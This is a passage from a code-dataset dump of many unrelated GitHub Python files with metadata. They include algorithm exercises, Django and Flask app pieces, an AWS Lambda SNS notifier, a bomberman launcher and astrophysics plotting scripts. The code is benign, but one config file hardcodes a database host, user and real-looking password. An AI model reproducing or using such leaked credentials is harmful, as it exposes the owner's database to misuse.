None\n\n context = {\n \"product\":product,\n \"already_liked\":already_liked,\n \"in_cart\":in_cart,\n \"product_opts\":pdict2,\n }\n return render(request, 'ecom/product_details.html', context)","repo_name":"Ronik22/Django_PizzaHub","sub_path":"ecom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"17541268776","text":"import sys\n\nseq = sys.stdin.readline().strip().split()\n\nres = []\n'''\nlens = tuple( len(i) for i in seq )\nsearch = 0 \nfor len_ in lens:\n if lens.count(len_) >= 2:\n search = len_\n break\nfor word in seq:\n if len(res)==2:\n break\n if len(word)==search:\n res.append(word)\nprint(\" \".join(res))\n'''\n\nindex0 = 0\nindex1 = 0\nlast_diff = 0\nlens = tuple( len(i) for i in seq )\n\nprint(lens)\n\nfor word in seq:\n for word_ in seq:\n if (index0 != index1) and ( len(word) == len(word_)): # Check that are not the same position in seq and len() to be equal\n last_diff = index0 - index1\n res.append(word+\" \"+word_)\n break\n index1 += 1\n index0 += 1\n index1 = 0\n\nif not res:\n print(\"All words have different lengths\")\nelse:\n print(res) \n","repo_name":"ilialecha/Programming_1","sub_path":"Exam-2-review/first_equal.py","file_name":"first_equal.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38520777881","text":"#!/usr/bin/env python3\nimport argparse\n\ndef findPrimes(ceiling):\n if ceiling < 2:\n print(\"No primes below {}\".format(ceiling))\n exit(1)\n\n # List of all primes found\n prime_list = []\n # Squares of all primes found\n prime_squares = []\n\n for number in range(2, ceiling):\n isPrime = True\n for index, prime in enumerate(prime_list):\n # Break on finding a factor\n if number % prime == 0:\n isPrime = False\n break\n\n # Break if all possible factors have been checked\n if prime_squares[index] > number: break\n\n # Store prime\n if isPrime:\n prime_list.append(number)\n prime_squares.append(number**2)\n\n return prime_list\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"max\", help=\"Find all primes below max\", type=int, default=1000, nargs='?')\n args = parser.parse_args()\n print(\"Primes below {}: {}\".format(args.max, findPrimes(args.max)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"nzimm/toolkit","sub_path":"eavesdropping/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17427793866","text":"#!/usr/bin python3\nimport sys, os, subprocess, argparse\n\nif __name__ == \"__main__\":\n try:\n import pygame\n except:\n try:\n import pip\n except:\n sys.exit(\"Could not import pip package manager. 
Please install pip for your python distribution.\")\n\n subprocess.check_call([\"python3\", '-m', 'pip', 'install', 'pygame']) # install pkg\n subprocess.check_call([\"python3\", '-m', 'pip', 'install',\"--upgrade\", 'pygame']) # upgrade pkg\n subprocess.check_call([\"python3\", '-m', 'pip', 'install', 'netifaces']) # install netifaces package\n\n sys.path.insert(0, \"%s/core/\" % os.path.dirname(os.path.realpath(__file__)))\n sys.path.insert(0, \"%s/bomberman_src/\" % os.path.dirname(os.path.realpath(__file__)))\n\n argparser = argparse.ArgumentParser(description=\"An online gridcoloring adventure written in Python.\")\n\n argparser.add_argument(\"--username\", dest=\"username\", help=\"Username\", required=True )\n argparser.add_argument(\"--client_port\", dest=\"port\",type=int, help=\"Client port\", required=True)\n argparser.add_argument(\"--serv_ip\", dest=\"server_ip\", help=\"Server ip address.\", required=True)\n argparser.add_argument(\"--serv_port\", dest=\"server_port\", type=int, help=\"Server port\", required=True)\n argparser.add_argument(\"--is_server\", dest=\"is_server\", action=\"store_true\", default=False, help=\"Make the player a server\")\n argparser.add_argument(\"--board_layout\", dest=\"board_layout\", type=int, default=1, choices=[0,1], help=\"Board layout { 0: Empty board | 1: Standard layout. }\")\n args = argparser.parse_args()\n\n import bomberman_main\n\n bomberman_main.main(args.username, args.port, args.server_ip, args.server_port, args.is_server, args.board_layout)\n\n\"\"\"\n try:\n bomberman_main.main(args.username, args.port, args.server_ip, args.server_port, args.is_server)\n except Exception as e:\n sys.exit(\"Game crashed with error: %s\" % e)\n\"\"\"","repo_name":"bcvb95/bomber_man","sub_path":"bomberman.py","file_name":"bomberman.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28482375761","text":"# -*- coding: utf-8 -*-\nfrom decorated.base.context import Context, ctx, ContextError\nfrom unittest.case import TestCase\n\nclass GetSetAttrTest(TestCase):\n def test_set(self):\n with Context(a=1):\n self.assertEquals(1, ctx.a)\n ctx.a = 2\n self.assertEquals(2, ctx.a)\n ctx.b = 3\n self.assertEquals(3, ctx.b)\n d = ctx.dict()\n self.assertEquals({'a': 2, 'b': 3}, d)\n \nclass GetTest(TestCase):\n def test_success(self):\n with Context():\n self.assertIsInstance(ctx.get(), Context)\n \n def test_no_context(self):\n with self.assertRaises(AttributeError):\n ctx.a\n","repo_name":"CooledCoffee/decorated","sub_path":"test/base_test/context_test/ctx_test.py","file_name":"ctx_test.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"81"} +{"seq_id":"13159850623","text":"from __future__ import print_function\nimport sys\nsys.path.append('..')\nfrom chapter2.linked_list import ListNode, restore_list\nfrom tree import create_tree\n\n\ndef create_level_linked_list_aux(root, lists, level):\n \"\"\"Preorder recursive\"\"\"\n if root is None:\n return\n # If `lists` does not contain any node at the level\n if len(lists) == level:\n l = ListNode(root.data)\n lists.append(l)\n else:\n l = lists[level]\n l.next = ListNode(root.data)\n create_level_linked_list_aux(root.left, lists, level + 1)\n create_level_linked_list_aux(root.right, lists, level + 1)\n\n\ndef create_level_linked_list(root):\n res = []\n create_level_linked_list_aux(root, res, 0)\n return res\n\n\ndef 
create_level_linked_list2(root):\n \"\"\"Level order\"\"\"\n res = []\n if root is None:\n return res\n queue = []\n level = ListNode(root.data)\n res.append(level)\n queue.append(root)\n queue.append(None)\n # `p` is a pointer to the last node of the linked list\n level = ListNode(0) # Second level\n p = level\n while queue:\n root = queue.pop(0)\n if root is None:\n if level.next is not None:\n res.append(level.next)\n if queue:\n queue.append(None)\n level = ListNode(0) # Dummy head for the next level\n p = level\n else:\n if root.left is not None:\n queue.append(root.left)\n p.next = ListNode(root.left.data)\n p = p.next\n if root.right is not None:\n queue.append(root.right)\n p.next = ListNode(root.right.data)\n p = p.next\n return res\n\n\ndef _test():\n pass\n\n\ndef _print():\n a1 = [1, 2, 3, 4, 5]\n a2 = [1, None, 3, None, 4]\n t1 = create_tree(a1)\n t2 = create_tree(a2)\n r1 = create_level_linked_list2(t1)\n r2 = create_level_linked_list2(t2)\n for l in r1:\n print(restore_list(l))\n for l in r2:\n print(restore_list(l))\n\n\nif __name__ == '__main__':\n _test()\n _print()\n","repo_name":"shichao-an/ctci","sub_path":"chapter4/question4.4.py","file_name":"question4.4.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37248144345","text":"# https://stackoverflow.com/questions/2501457/what-do-i-use-for-a-max-heap-implementation-in-python\n# https://www.adamsmith.haus/python/answers/how-to-use-a-max-heap-in-python\n\n#!!!我的問題:8/6 用 _heapify_max和_heappop_max,反而跑不出答案...Why???\n# 8/8 JM 因為沒有搭配的_heappush_max啊!\n\n\n# Get the MAX heap\nclass Solution:\n\n def lastStoneWeight(self, stones: List[int]) -> int:\n stones = [-s for s in stones]\n heapq.heapify(stones)\n\n while len(stones) > 1:\n # 2/9 必須這樣,不然second會溢出範圍\n first = heapq.heappop(stones)\n second = heapq.heappop(stones)\n if second > first:\n heapq.heappush(stones, first - second)\n # 2/9 first - second才會是負數啊!\n # heapq.heappush(heap, item)\n stones.append(0)\n # 2/9 亦可為heapq.heappush(stone_heap, 0)\n # \"At the end,there is at most 1 stone left.Return its weight\"\n # To handle the eade case\n # (that the stones is empty)\n return abs(stones[0])\n\n # because we *-1 in the begining\n","repo_name":"YiruDing/LeetcodePractice","sub_path":"Neetcode305/Heap/1046_Last_Stone_Weight.py","file_name":"1046_Last_Stone_Weight.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29453468626","text":"#!/usr/bin/python3\n#coding:utf8\n\n# http://projecteuler.net/problem=15\n#\n# PROBLEM CONTENT:\n# Starting in the top left corner of a 2×2 grid, and only being able to move\n# to the right and down, there are exactly 6 routes to the bottom right corner.\n#\n# How many such routes are there through a 20×20 grid?\n#\n# EXPLANATION:\n# The number of paths from a point to the bottom-right corner is the sum of the\n# number of paths from the point on its right to the bottom-right corner + the\n# number of paths from the point below it to the bottom-right corner. Points at\n# the border of the grid only have one possible path to the bottom-right\n# corner: always right or always down. 
Setting the boundary conditions we can\n# work recursively from the almost-bottom-right corner to the top-right corner.\n#\n# For a 2x2 grid (note: there n+1 nodes):\n# 0--0--1 0--0--1 0--3--1 6--3--1\n# 0--0--1 ---> 0--2--1 ---> 3--2--1 ---> 3--2--1 ---> Answer: 6\n# 1--1--1 1--1--1 1--1--1 1--1--1\n#\n# A square matrix like this one can be simplified further by only computing the\n# terms of one of the top diagonal part, since it is simmetric. I have decided\n# to use a more general method.\n\nimport time\n\nhorDim = 20\nverDim = 20\n\n\ndef initialise_nodes_grid(nodesGrid):\n defaultRow = [0 for i in range(0,horDim+1)]\n defaultRow[horDim] = 1\n for i in range(0, verDim):\n nodesGrid.append(defaultRow)\n nodesGrid.append([1 for i in range(0, horDim+1)])\n\ndef main():\n # Matrix representing the number of paths from a node to the bottom-right\n # corner\n nodesGrid = []\n initialise_nodes_grid(nodesGrid)\n for i in range(verDim-1, -1, -1):\n for j in range(horDim-1, -1, -1):\n nodesGrid[i][j] = nodesGrid[i+1][j] + nodesGrid[i][j+1]\n print(nodesGrid[0][0])\n\nif __name__ == '__main__':\n start = time.time()\n main()\n elapsed = time.time() - start\n print('Solved in %.2f seconds' % elapsed)\n","repo_name":"nachogoro/euler_project","sub_path":"Problem015.py","file_name":"Problem015.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16475872804","text":"\"\"\"\nFind the kth largest element in an unsorted array. Note that it is the kth largest element in the sorted order, not the kth distinct element.\n\nExample 1:\n\nInput: [3,2,1,5,6,4] and k = 2\nOutput: 5\nExample 2:\n\nInput: [3,2,3,1,2,4,5,5,6] and k = 4\nOutput: 4\n\"\"\"\n\n# This can be done using a max heap of size k.\n# The time complexity is O(nlogk) where n is the size of array and k is the\n# input k.\n\n# This can be implemented using a technique similar to quicksort as well.\n# This technique is also called order statistic.\n# Logic behind this:\n# When we take a pivot and do the quicksort partition, we know how many\n# elements are on either side of the pivot after the parititon loop. 
We can use\n# this knowledge to know which side to look for and when to stop.\n\ndef get_kth_largest(nums, k):\n\tif len(nums) < k: return -1\n\treturn _get_kth_largest_helper(nums, k, 0, len(nums)-1)\n\ndef _get_kth_largest_helper(nums, k, start, end):\n\tleft = start\n\ti = left - 1\n\tpivot = nums[end]\n\n\twhile left < end:\n\t\tif nums[left] >= pivot:\n\t\t\ti += 1\n\t\t\tnums[i], nums[left] = nums[left], nums[i]\n\t\tleft += 1\n\tnums[i+1], nums[end] = nums[end], nums[i+1]\n\tif i+1 == k-1:\n\t\treturn pivot\n\telif i+1 < k-1:\n\t\treturn _get_kth_largest_helper(nums, k, i+2, end)\n\telse:\n\t\treturn _get_kth_largest_helper(nums, k, start, i)\n\nassert get_kth_largest([3, 2, 1, 5, 6, 4], 2) == 5\nassert get_kth_largest([9, 2, 10, 8, 17, 5], 4) == 8\t\n","repo_name":"henchhing-limbu/Interview-Questions","sub_path":"Array-String/kth_largest.py","file_name":"kth_largest.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"31638579745","text":"products = [\n {\n 'product' : 'camisa',\n 'price': 100\n },\n {\n 'product' : 'pantalones',\n 'price': 300\n },\n {\n 'product' : 'shorts',\n 'price': 180\n }\n]\n\nprices = list(map(lambda item: item['price'], products))\n\nprint(prices)\n\n#agregaremos el atributo impuesto a products con una funcion y map\n\ndef add_tax(el):\n el['taxes'] = el['price'] * .19\n return el\n\n\nnew_products = map(add_tax,products)\n#new_products = map (add_tax, products)\n\nnew_products = list(new_products)\n\nprint(new_products)\nprint(' ')\nprint(products)\n\n ","repo_name":"monick96/Python2","sub_path":"15-map-dicts.py","file_name":"15-map-dicts.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44201888497","text":"# brandt's c code for radiative transfer outputs to a .dat file.\n# here I read the data and plot the alphas.\n\n# I've moved a copy to the dust_scripts folder so I can back up to github.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom generate_plots import generate_binned_alphas\n\ndust_model = 'wd' # wd\n\na_300 = 0.9\na_1350 = 0.1\nsig_star = 1.2 # hard coded in the c code\n\n# set up grid of f values (which transform into z_s)\nn_f = 30\nf_min, f_max = 0, 1\nh_f = (f_max - f_min) / n_f / 2\nf_grid = np.linspace(f_min + h_f, f_max - h_f, n_f)\n\n# set up arrays to store total integral\n# and get the wavelengths\n# column 0: lambdas\n# column 1: tau0\n# column 2: sca integral\n# column 3: tir integral\n# column 4: albedo\nif dust_model == 'zd':\n test_data = np.loadtxt('dustsheet_0.15_40_0.5.dat')\nelif dust_model == 'wd':\n test_data = np.loadtxt('dustsheet_0.15_40_0.55_wd01.dat')\ntotal_int = np.zeros(test_data.shape[0])\ntotal_int_denom = np.zeros(test_data.shape[0])\nlambdas = test_data[:, 0]\n\n# get bc03 spectrum\nimport glob\nfrom scipy.interpolate import interp1d\npaths = glob.glob('/Users/blakechellew/Documents/DustProject/BrandtFiles/bc03/*.spec')\nfor p in paths[22:23]:\n print(\"verify path name:\", p)\n a = np.loadtxt(p)\n wav = a[:, 0] # angstroms\n bc03 = a[:, 1]\n bc03_f = interp1d(wav, bc03, kind='cubic')\n\n# integrate\n# maybe run \"make\" first? 
in case I forgot.\nfor f in f_grid:\n if dust_model == 'zd':\n load_path = 'dustsheet_0.15_40_' + str(f) + '.dat'\n if not os.path.isfile(load_path):\n os.system('./sheetint 0.15 40 ' + str(f))\n elif dust_model == 'wd':\n load_path = 'dustsheet_0.15_40_' + str(f) + '_wd01.dat'\n if not os.path.isfile(load_path):\n os.system('./sheetint 0.15 40 ' + str(f) + ' 2')\n\n data = np.loadtxt(load_path)\n intval = data[:, 2]\n intval_denom = data[:, 3]\n if f < .5:\n transform_factor = sig_star / f\n z_s = sig_star * np.log(2*f)\n else:\n transform_factor = sig_star / (1-f)\n z_s = -sig_star * np.log(2*(1-f))\n print(\"z_s:\", z_s)\n\n # add to the total integral:\n surface_power_factor = a_300 * np.exp(-np.abs(z_s)/300) + a_1350 * np.exp(-np.abs(z_s)/1350)\n df = (f_max - f_min) / n_f\n dz = 2 * sig_star * np.exp(np.abs(z_s) / sig_star) * df\n print(\"integral result:\", intval)\n print(\"integral denom:\", intval_denom)\n print(\"surface_power_factor:\", surface_power_factor)\n total_int += intval * surface_power_factor * dz\n total_int_denom += intval_denom * surface_power_factor * dz\n\n# add up I_tir:\nI_tir = np.sum(total_int_denom * bc03_f(lambdas))\nnu_I_nu = I_tir * 0.52\n\n# plot various things\n# TODO: need to plot against BOSS wavelengths with interpolation and binning (to see where the peak really is)\n# TODO: seems like the z_s range might not be large enough. only goes up to 6 pc I think.\n# TODO: actually should multiply by derivative of surface_power_factor (I think...)\n# TODO: reproduce the results of the other dust model also\n\n# load BOSS wavelengths, prep for interpolation\nboss_lambdas = np.load('/Users/blakechellew/Documents/DustProject/alphas_and_stds/wavelength_boss.npy') # angstroms\ntotal_int_f = interp1d(lambdas, total_int, kind='cubic')\n\nif dust_model == 'zd':\n bd12_factor = 0.52\nelif dust_model == 'wd':\n bd12_factor = 0.49\nplot1 = lambdas * bc03_f(lambdas)\nplot2 = total_int / nu_I_nu\nplot3 = bd12_factor * boss_lambdas * total_int_f(boss_lambdas) / nu_I_nu * bc03_f(boss_lambdas)\n\n# bin the main plot\nlambdas_boss_bin, plot3_bin, stds = generate_binned_alphas([plot3], [np.ones(plot3.shape)], boss_lambdas)\nplot3_bin = plot3_bin[0]\n\nplot1_mean = np.mean(plot1)\nplot2_mean = np.mean(plot2)\nplot3_mean = np.mean(plot3)\nprint(\"plot1\", plot1)\nprint(\"plot2\", plot2)\nprint(\"plot3\", plot3)\nprint(\"plot 1 mean:\", plot1_mean)\nprint(\"plot 2 mean:\", plot2_mean)\nprint(\"plot 3 mean:\", plot3_mean)\nplt.plot(lambdas, plot1 * plot3_mean / plot1_mean, label='bc03 * wav')\nplt.plot(lambdas, plot2 * plot3_mean / plot2_mean, label='just the integral')\nplt.plot(lambdas_boss_bin, plot3_bin, step='pre', label='predicted alphas')\nplt.legend()\nplt.xlim(3800, 9200)\nplt.show()","repo_name":"bchellew15/DustProject","sub_path":"python_scripts/read_c_output_copy.py","file_name":"read_c_output_copy.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7545457557","text":"SECRET_KEY = \"django-insecure\"\nDEBUG = True\nALLOWED_HOSTS = []\nINSTALLED_APPS = [\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"django.contrib.auth\",\n \"django.contrib.admin\",\n \"ottu.contrib.django\",\n \"tests.test_ottu.test_contrib.test_django.polls\",\n]\n\nMIDDLEWARE = []\n\nROOT_URLCONF = \"tests.test_ottu.test_contrib.test_django.polls.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n 
},\n]\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n },\n}\n\nDEFAULT_AUTO_FIELD = \"django.db.models.AutoField\"\n\nUSE_TZ = True\n\n# Ottu settings\nOTTU_MERCHANT_ID = \"test.ottu.dev\"\nOTTU_AUTH_USERNAME = \"dj_username\"\nOTTU_AUTH_PASSWORD = \"dj_password\"\nOTTU_WEBHOOK_URL = \"https://test.client.dev/webhook-receiver/\"\nOTTU_WEBHOOK_KEY = \"pu9MpX3yPR\"\n","repo_name":"ottuco/ottu-py","sub_path":"tests/test_ottu/test_contrib/test_django/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4123177685","text":"# Given two words word1 and word2, find the minimum number of operations required to convert word1 to word2.\n#\n# You have the following 3 operations permitted on a word:\n# Insert a character\n# Delete a character\n# Replace a character\n#\n# Example 1:\n# Input: word1 = \"horse\", word2 = \"ros\"\n# Output: 3\n# Explanation:\n# horse -> rorse (replace 'h' with 'r')\n# rorse -> rose (remove 'r')\n# rose -> ros (remove 'e')\n#\n# Example 2:\n# Input: word1 = \"intention\", word2 = \"execution\"\n# Output: 5\n# Explanation:\n# intention -> inention (remove 't')\n# inention -> enention (replace 'i' with 'e')\n# enention -> exention (replace 'n' with 'x')\n# exention -> exection (replace 'n' with 'c')\n# exection -> execution (insert 'u')\n\n\ndef min_distance(word1, word2):\n len1 = len(word1) + 1\n len2 = len(word2) + 1\n\n dp = [[0] * len2 for _ in range(len1)]\n for i in range(1, len1):\n dp[i][0] = i\n for j in range(1, len2):\n dp[0][j] = j\n\n for i in range(1, len1):\n for j in range(1, len2):\n cost = 0 if word1[i - 1] == word2[j - 1] else 1\n dp[i][j] = min(dp[i - 1][j] + 1, # delete\n dp[i][j - 1] + 1, # insert\n dp[i - 1][j - 1] + cost) # replace\n for e in dp:\n print(e)\n print('')\n return dp[-1][-1]\n\n\nprint(min_distance('horse', 'rose'))\nprint(min_distance('intention', 'execution'))\nprint(min_distance('algorithm', 'altruistic'))\n","repo_name":"vpc20/python-dynamic-programming","sub_path":"EditDistance.py","file_name":"EditDistance.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69826657864","text":"from Bio import SeqIO\n\n\nclass Genome:\n\n def __init__(self, file):\n\n self.file = file\n self.dict_genome = None\n\n def read_fasta(self):\n \"\"\"\n Reads a fasta file using SeqIO\n \"\"\"\n self.dict_genome = SeqIO.to_dict(SeqIO.parse(self.file, \"fasta\"))\n\n def check_position_sequence_in_genome(self, genome, seq):\n \"\"\"\n Returns a dictionary containing the start\n and end of each sequence inside genome.\n \"\"\"\n result = dict()\n\n for s in seq:\n\n intermediate_list = []\n\n for i in range(0, len(genome), 1):\n if genome[i:len(s) + i] == s:\n intermediate_list.append((s, i, len(s) + i))\n\n result[s] = intermediate_list\n\n return result\n\n","repo_name":"zohyan/window-search-in-a-genome","sub_path":"genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"71381522505","text":"from Student import Student\nfrom flask import Flask\nfrom flask_mysqldb import MySQL #for flask-mysqldb\nfrom Module import *\napp = Flask(__name__)\n# Database Config\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 
''\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_DB'] = '2101project'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\napp.config['SECRET_KEY'] = b'6hc/_psp,./;2ZZx3c6_s,1//'\n\nmysql = MySQL(app)\n\nclass StudentController:\n def __init__(self, UID):\n self.UID = UID\n\n def viewModule(self, type=\"\", MID=1):\n # retrieve all modules from DB\n if type == \"code\":\n module = moduleList(self.UID).fetchModules()\n elif type == \"name\":\n module = moduleList(self.UID).getModuleName(MID)\n return module\n\n def viewFeedback(self):\n cur = mysql.connection.cursor()\n cur.execute(\n \"SELECT * FROM feedback f, user u WHERE FReceiver=\" + self.UID + \" AND f.FSender = u.UID;\")\n data = cur.fetchall()\n\n return data\n\n","repo_name":"puglord96/ICT-2101-Project","sub_path":"StudentController.py","file_name":"StudentController.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74393689544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File : configs.py\n# @Date : 28-12-2021\n# @Author : Payne\n# @Email : wuzhipeng1289690157@gmail.com\n# @Desc:\nfrom typing import AnyStr, List, Dict\nfrom environs import Env\nfrom loguru import logger\nfrom os.path import dirname, abspath, join\n\nenv = Env()\nenv.read_env()\n\n# definition of dirs\nROOT_DIR = dirname(dirname(abspath(__file__)))\n\n# definition of environments\nDEV_MODE, TEST_MODE, PROD_MODE = \"dev\", \"test\", \"prod\"\nAPP_ENV = env.str(\"APP_ENV\", DEV_MODE).lower()\nAPP_DEBUG = env.bool(\"APP_DEBUG\", True if APP_ENV == DEV_MODE else False)\nAPP_DEV = IS_DEV = APP_ENV == DEV_MODE\nAPP_PROD = IS_PROD = APP_ENV == PROD_MODE\nAPP_TEST = IS_TEST = APP_ENV == TEST_MODE\n\n# logs config\nENABLE_LOG_FILE = env.bool(\"ENABLE_LOG_FILE\", True)\nENABLE_LOG_RUNTIME_FILE = env.bool(\"ENABLE_LOG_RUNTIME_FILE\", True)\nENABLE_LOG_ERROR_FILE = env.bool(\"ENABLE_LOG_ERROR_FILE\", True)\n\nLOG_DIR = join(ROOT_DIR, env.str(\"LOG_DIR\", \"Logs\"))\n\nLOG_LEVEL_MAP = {DEV_MODE: \"DEBUG\", TEST_MODE: \"INFO\", PROD_MODE: \"ERROR\"}\n\nLOG_LEVEL = LOG_LEVEL_MAP.get(APP_ENV)\n\nif ENABLE_LOG_FILE:\n if ENABLE_LOG_RUNTIME_FILE:\n logger.add(\n env.str(\"LOG_RUNTIME_FILE\", join(LOG_DIR, \"runtime.log\")),\n level=LOG_LEVEL,\n enqueue=True,\n rotation=\"1 week\",\n retention=\"20 days\",\n )\n if ENABLE_LOG_ERROR_FILE:\n logger.add(\n env.str(\"LOG_ERROR_FILE\", join(LOG_DIR, \"error.log\")),\n level=\"ERROR\",\n enqueue=True,\n rotation=\"1 week\",\n )\n\n# from environs import Env\n# env = Env()\n\n# Filter URL\n# ResourceList: Dict = env.dict('URLS', {\n# \"xiaohongshu\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n# })\n\n# Search key word List\n# KeyWord: List[AnyStr] = env.list('KeyWord', [])\n\n# Mysql Client Param\n# MySQLClientParam: Dict = env.dict('MySQLClient', {\n# 'host': '127.0.0.1',\n# 'port': 3306,\n# 'user': 'root',\n# 'password': '123123',\n# 'database': '',\n# })\n\nResourceList: Dict = {\n \"xhs_lv\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n # \"xhs_search\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n}\n\nMySQLClientParam: Dict = {\n \"host\": \"10.21.200.48\",\n \"port\": 3306,\n \"user\": \"opinion\",\n \"password\": \"vDGM0lspmy=\",\n \"database\": 
\"opinion\",\n}\n","repo_name":"WebSpiderSuperStar/Intermediary","sub_path":"Intermediary/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36072902174","text":"\"\"\"Create a SNS notfication once a transcibe job is completed\"\"\"\nimport os\n\nimport aws_lambda_powertools as alp\nimport aws_lambda_powertools.utilities.data_classes as aws_dataclasses\nimport aws_lambda_powertools.utilities.typing as aws_tyiping\nimport boto3\n\nlogger = alp.Logger()\n\n@logger.inject_lambda_context\ndef lambda_handler(event: dict[str, any], context: aws_tyiping.LambdaContext) -> dict[str, any]:\n event = aws_dataclasses.S3Event(event)\n logger.info(f\"Got event: {event.raw_event!r}\")\n\n destination = os.getenv(\"DESTINATION_SNS\")\n if not destination:\n logger.error(\"No destination set...\")\n return {}\n\n with open(\"email_template.md\", \"r\") as fp:\n body = fp.read()\n\n body = body.format(file_uri=f\"s3://{event.bucket_name}/{event.object_key}\")\n\n sns_client = boto3.client(\"sns\")\n sns_client.publish(\n TopicArn=destination,\n Message=body,\n Subject=f\"Transcribe job completion for file: s3://{event.bucket_name}/{event.object_key}\",\n )\n\n return {}\n","repo_name":"HanaPoulpe/AWSTranscribeBase","sub_path":"src/awslambda/email_notification/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15354742757","text":"from flask_smorest import Blueprint , abort\nfrom flask.views import MethodView\nfrom resources.Schemas import TagSchema,PlainTagSchmea , TagAndItemSchema\nfrom db import db\nfrom models import ItemModel , StoreModel , TagModel\nfrom sqlalchemy.exc import SQLAlchemyError\n\nblp = Blueprint(\"tags\" , __name__ , description = 'operation on tags')\n\n@blp.route(\"/store//tag\")\nclass Tags(MethodView):\n\n # this will return all tags , at given store\n @blp.response(200 ,PlainTagSchmea(many=True))\n def get(self,store_id):\n store = StoreModel.query.get_or_404(store_id)\n return store.tags.all()\n\n @blp.arguments(TagSchema)\n @blp.response(201, TagSchema)\n def post(self,tag_data,store_id):\n if(TagModel.query.filter(TagModel.store_id == store_id , TagModel.tag_name == tag_data['tag_name']).first()):\n abort(400 , message = \"Tag is already created\")\n tag = TagModel(store_id = store_id , **tag_data)\n try:\n db.session.add(tag)\n db.session.commit()\n except SQLAlchemyError as e:\n abort(500 , message= str(e))\n return tag\n\n@blp.route(\"/tag/\")\nclass TagsList(MethodView):\n\n @blp.response(200 , PlainTagSchmea)\n def get(self,tag_id):\n return TagModel.query.get_or_404(tag_id)\n\n def delete(self,tag_id):\n tag = TagModel.query.get_or_404(tag_id)\n if(tag):\n db.session.delete(tag)\n db.session.commit()\n return {\"message\" : \"tag deleted successfully\"}\n\n@blp.route(\"/item//tag/\")\nclass LinkTagsToItem(MethodView):\n\n @blp.response(201, TagSchema)\n def post(self, item_id , tag_id):\n item = ItemModel.query.get_or_404(item_id)\n tag = TagModel.query.get_or_404(tag_id)\n item.tags.append(tag)\n try:\n db.session.add(item)\n db.session.commit()\n except SQLAlchemyError as e:\n abort(500 , message=str(e))\n return tag\n\n def delete(self, item_id, tag_id):\n item = ItemModel.query.get_or_404(item_id)\n tag = TagModel.query.get_or_404(tag_id)\n item.tags.remove(tag)\n try:\n db.session.add(item)\n 
db.session.commit()\n except SQLAlchemyError as e:\n abort(500, message=str(e))\n return {\"message\" : \"item removed from tag \", \"item\" : item.item_name , \"tag\" : tag.tag_name }\n\n","repo_name":"skarwa4491/Store","sub_path":"resources/Tags.py","file_name":"Tags.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29812527049","text":"\"\"\"\n\n @brief: The test script for the coordinate transformation using the d435 camera, aruco-based world frame, and the manually set world-to-robot transformation\n\n @author: Yiye Chen. yychen2019@gatech.edu\n @date: 11/28/2021\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\nimport camera.d435.runner as d435\nfrom camera.extrinsic.aruco import CtoW_Calibrator_aruco\nimport camera.utils.display as display\n\nfrom Surveillance.utils.transform import 